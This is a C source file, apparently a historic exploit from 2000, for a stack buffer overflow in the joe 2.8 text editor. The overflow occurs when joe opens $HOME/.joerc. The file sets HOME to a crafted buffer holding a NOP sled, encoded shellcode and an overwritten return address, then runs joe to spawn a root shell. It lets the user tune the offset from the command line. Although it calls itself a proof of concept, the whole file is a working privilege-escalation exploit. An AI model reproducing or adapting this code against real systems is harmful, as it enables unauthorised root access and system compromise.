/*
  
  joe v2.8 stack overflow by SectorX of XOR (http://xorteam.cjb.net)
  joe overflows when trying to open() $HOME/.joerc, this is simply a proof
  of concept, hopefully to get the bug fixed. will attempt to spawn a rootshell.
  
  --sectorx <sectorx@digitalphobia.com>
          http://xorteam.cjb.net
  
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define NOP 0x90
#define BSIZE 1032

char shellcode[] =
  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
  "\xc2\x91";

long get_sp()
{
  __asm__("mov %esp, %eax");
}

int main(int argc, char *argv[])
{
  char buffer[BSIZE];
  int offset;
  long stack = get_sp();

  fprintf(stderr,"joe stack overflow by SectorX of XOR\n");
  fprintf(stderr,"* offsets can be supplied as a parameter.\n\n");

  offset = 0x5dc;
  if (argc > 1)
    offset = atoi(argv[1]);

  memset(&buffer,NOP,BSIZE);
  memcpy(buffer+BSIZE-strlen(shellcode)-5,shellcode,strlen(shellcode));

  // last 4 bytes overwrites %eip
  *(long*)&buffer[BSIZE-4] = stack+offset;
  buffer[BSIZE] = '\0';

  printf("Using offset 0x%x, return address set to 0x%x\n",offset,stack+offset);
  setenv("HOME",buffer,1);
  system("joe");
}
/*                    www.hack.co.za           [8 June 2000]*/